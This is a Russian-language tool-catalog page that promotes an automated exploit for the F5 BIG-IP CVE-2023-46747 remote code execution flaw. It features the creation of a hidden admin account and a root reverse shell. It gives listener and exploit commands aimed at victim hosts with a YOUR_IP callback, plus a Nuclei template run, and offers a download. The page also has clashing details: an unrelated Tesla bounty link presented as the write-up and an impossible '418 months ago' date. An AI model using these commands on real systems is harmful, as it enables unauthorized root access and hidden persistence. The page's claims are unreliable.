Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – Неавторизованный RCE Python эксплойт и шаблон Nuclei от Raguraman ✓ Автоматическая обратная TCP-оболочка (LHOST/LPORT) ✓ Протестировано на уязвимых BIG-IP 13.x–17.x ⚠️ Только для авторизованного пентестинга | Kitploit
Инструменты/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – Неавторизованный RCE Python эксплойт и шаблон Nuclei от Raguraman ✓ Автоматическая обратная TCP-оболочка (LHOST/LPORT) ✓ Протестировано на уязвимых BIG-IP 13.x–17.x ⚠️ Только для авторизованного пентестинга

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
418 месяцев назадЕщё не проверено

F5 BIG-IP CVE-2023-46747 – Неавторизованное RCE + Обратная оболочка

Версии Python3 и Nuclei – от raguraman

Критическое неавторизованное RCE (CVSS 9.8) через AJP + контрабанда HTTP-запросов
Работает на всех необновленных BIG-IP 13.x → 17.x (включая последний 17.1.0.3)
Патч: https://my.f5.com/manage/s/article/K000137353 (Ноябрь 2023)

Реальный разбор эксплойта: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

Возможности

  • Полностью автоматизировано (без ручных действий)
  • Работает с доменным именем или IP-адресом
  • Создает скрытого администратора
  • Мгновенная обратная TCP-оболочка (root)
  • Чистый вывод с учетными данными + токеном

Файлы

  • f5-bigip-cve-2023-46747-revshell.py → автономный Python3 (рекомендуется)
  • CVE-2023-46747-revshell.yaml → шаблон Nuclei (опционально)

Использование – Python3 (самый быстрый и надежный)

root@kitploit:~
# 1. Start your listener
nc -lvnp 4444

# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444

# → Instant root shell!

Использование – шаблон Nuclei (альтернатива) Bash # 1. Отредактируйте LHOST и LPORT внутри YAML-файла

2. Запустите слушатель

nc -lvnp 4444

3. Сканируйте

nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com

Юридическое предупреждение

Этот инструмент предназначен исключительно для авторизованного тестирования безопасности, например:

Одобренные пентесты

Операции красной команды с письменного разрешения

Исследования в контролируемой лабораторной среде

Не используйте этот эксплойт на системах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения. Несанкционированное использование незаконно и может повлечь уголовное преследование.

Используя этот инструмент, вы принимаете на себя полную ответственность за соблюдение применимых законов. Автор не несет ответственности за любое неправомерное использование или ущерб.

Скачать инструмент